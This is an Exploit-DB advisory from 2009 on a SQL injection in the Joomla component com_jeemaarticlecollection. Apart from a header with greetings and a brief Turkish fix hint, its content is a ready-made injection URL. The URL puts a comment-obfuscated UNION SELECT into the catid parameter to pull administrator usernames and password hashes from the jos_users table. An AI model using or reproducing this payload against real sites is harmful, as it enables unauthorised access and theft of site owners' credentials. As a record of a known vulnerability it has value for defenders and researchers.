Joomla Component com_jeemaarticlecollection SQL injection

2009-12-24T00:00:00
ID EDB-ID:10625
Type exploitdb
Reporter FL0RiX
Modified 2009-12-24T00:00:00

Description

Joomla Component com_jeemaarticlecollection SQL injection. Webapps exploit for php platform

                                        
                                            <------------------- header data start ------------------- >

#############################################################
       Joomla Component com_jeemaarticlecollection SQL injection Vulnerability                                          
#############################################################

#author        : Fl0riX

# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r

# Name        : com_jeemaarticlecollection

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri al�nabilir.

# Bug Fix Advice : Zararl� karakterler filtrelenmelidir. Kimsesizli�im O Dereceye Vard� Ki �evremde Bela Girdab�ndan Ba�ka D�nen Kimse Yok.(!)

# Note : Kimsesizli�im O Dereceye Vard� Ki �evremde Bela Girdab�ndan Ba�ka D�nen Kimse Yok.(!)

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection

< -- bug code end of -- >